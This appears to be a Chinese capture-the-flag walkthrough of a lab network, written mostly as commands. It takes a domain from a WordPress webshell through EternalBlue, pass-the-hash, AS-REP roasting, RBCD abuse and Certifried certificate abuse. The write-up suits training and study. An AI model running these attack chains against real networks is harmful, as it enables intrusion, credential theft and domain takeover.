渗透
春秋云镜-2022网鼎杯半决赛复盘
flag01
fscan扫描
1 | .\fscan -h 39.99.228.226 |
使用Wappalyzer发现是web服务是wordpress 6.2.6
那先用wpscan扫描一下,没啥发现
1 | wpscan --url http://39.99.228.226:80 --enumerate vp,vt,tt,u |
扫描目录得到wp-admin,然后admin/123456弱口令登录后台。然后编辑插件
再根据wordpress的目录规则找到木马位置
http://39.99.228.226/wp-content/plugins/akismet/akismet.php
用蚁剑成功连接
flag01: flag{336af0e6-723b-4b56-90bc-eafd0f6caa2c}
flag02
上线Vshell,扫下内网
1 | 172.22.15.35:135 open |
小小总结
172.22.15.13 DC
172.22.15.18 XR-CA.xiaorang.lab
172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601
172.22.15.26 外网
172.22.15.35 XIAORANG\XR-0687
发现有个Windows Server 2008 R2
直接打永恒之蓝看看
1 | proxychains msfconsole |
成功了
但是msf一直读不到flag,也拿不到shell
1 | meterpreter > hashdump |
打一个pth来横向
1 | proxychains -q python3 wmiexec.py -hashes :0e52d03e9b939997401466a0ec5a9cbc xiaorang.lab/administrator@172.22.15.24 -codec gbk |
flag02: flag{44e7697e-f9dc-4afc-86e7-54d15310f01c}
flag03
本来想rdp上去看的,但是报错了。
访问http://172.22.15.24/www/sys/index.php服务,依旧admin/123456弱口令登录
然后后台管理里面,可以导出一堆账号
1 | lixiuying@xiaorang.lab |
然后打一个AS-ERP Roasting
1 | proxychains -q impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile usernames.txt xiaorang.lab/ |
跑到两个哈希
1 | $krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:446c1896086281087832a8e2a7738c6c$d566cd98b0f19a8c28b113f40b0ad5a6861be2756e5793df1f937af73d4c499f64bf607027f2e12544807905f6fa9ff2a045fec8f9b0fafa706327ef3d76ef41dbe48d3bece3db903b0dae1f52b46f35441b32c0448e42c003a53c6c8b72815f4d4e4512e2ecda083e9050898008944d59f54c64c3a7b6d39fb2d8f5c32b399ee34325d0a085f193056f1651e8713fed7099b970377277c88be436c1b612a85cc86d2e6f41a470bf175481c8da0ad0ea83c63d4fc6c58ec33ebdaa4f3ac23b1ee6c86d77acc3e12c053bfcd0453ee10d886e5c09c10a26db216b3182d5607a844064eb78cdac91b07f01ef46 |
用hashcat爆破一下。
1 | lixiuying:winniethepooh |
用跑出来的名字做域信息收集
1 | proxychains -q bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp |
发现域用户 LIXIUYING 对计算机 XR-0687$ 具有 Generic Write 权限。bloodhound里面说了这个可以打RBCD
打一个RBCD。详情可以看春秋云镜-Flarum
改host
1 | 172.22.15.35 XR-0687.xiaorang.lab |
添加机器账号
1 | proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973' |
修改msDS-AllowedToActOnBehalfOfOtherIdentity
1 | proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$' |
这一步报错了[-] unsupported hash type MD4
查了一下好像是conda安装的python有点问题,改成我使用conda之前的python成功执行
1 | proxychains -q python3.13 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$' |
申请票据
1 | proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13 |
导入票据
1 | export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache |
然后打PTT拿flag
1 | proxychains -q python smbexec.py -no-pass -k XR-0687.xiaorang.lab |
flag03: flag{01fa7242-bc72-4842-8f0d-f894205e9d81}
flag04
一开始fscan扫内网的时候有poc-yaml-active-directory-certsrv-detect。查一下证书
1 | proxychains -q certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout |
又是CVE-2022-26923 (Certifried)。可以跟着MagicRelay机器那样打。详情可以看春秋云镜-MagicRelay
创建账号,并将该机器账户 dNSHostName 属性指向域控:
1 | proxychains -q certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user citrus -dns XR-DC01.xiaorang.lab -debug |
申请Machine证书(这里得执行两次
1 | proxychains -q certipy-ad req -u 'citrus$@xiaorang.lab' -p '5L0GV5vItnNirHOc' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -dc-ip 172.22.15.13 -template 'Machine' -debug |
尝试直接拿域管哈希(依旧报错了)
1 | proxychains -q certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13 |
选择从证书里面转储crt和key
1 | certipy-ad cert -pfx xr-dc01.pfx -nokey -out xr-dc01.crt |
改msDS-AllowedToActOnBehalfOfOtherIdentity
1 | proxychains -q python passthecert.py -action write_rbcd -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'citrus$' |
申请票据
1 | proxychains -q impacket-getST xiaorang.lab/'citrus$':'5L0GV5vItnNirHOc' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13 |
导入票据
1 | unset KRB5CCNAME |
PTT
1 | proxychains -q python smbexec.py -no-pass -k XR-DC01.xiaorang.lab |
flag04: flag{962a1c5c-b9d8-4c8d-b23f-32d3fcd9aab0}
参考文章